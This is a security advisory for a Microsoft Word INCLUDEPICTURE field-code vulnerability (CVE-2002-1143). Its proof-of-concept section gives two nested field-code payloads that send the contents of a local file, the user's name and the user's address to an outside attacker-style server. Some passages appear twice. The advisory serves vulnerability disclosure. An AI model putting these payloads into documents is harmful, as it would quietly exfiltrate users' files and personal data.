Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
BID:5764
Info
Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
| Bugtraq ID: | 5764 |
| Class: | Design Error |
| CVE: |
CVE-2002-1143 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 20 2002 12:00AM |
| Updated: | Jul 11 2009 05:06PM |
| Credit: | Discovery of this vulnerability credited to Richard Edwards. |
| Vulnerable: |
Microsoft Word 98 Microsoft Word 97 SR2 Microsoft Word 97 SR1 Microsoft Word 97 Microsoft Word 95 Microsoft Word 2002 SP1 Microsoft Word 2002 Microsoft Word 2000 SR1a Microsoft Word 2000 SR1 Microsoft Word 2000 SP2 Microsoft Word 2000 |
| Not Vulnerable: | |
Discussion
Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.
If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.
An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system.
The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.
If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.
An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system.
Exploit / POC
Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
The following examples were submitted by Alex Gantman <[email protected]>:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }
(The curly braces above represent Microsoft Word field braces.)
The following examples were submitted by Alex Gantman <[email protected]>:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }
(The curly braces above represent Microsoft Word field braces.)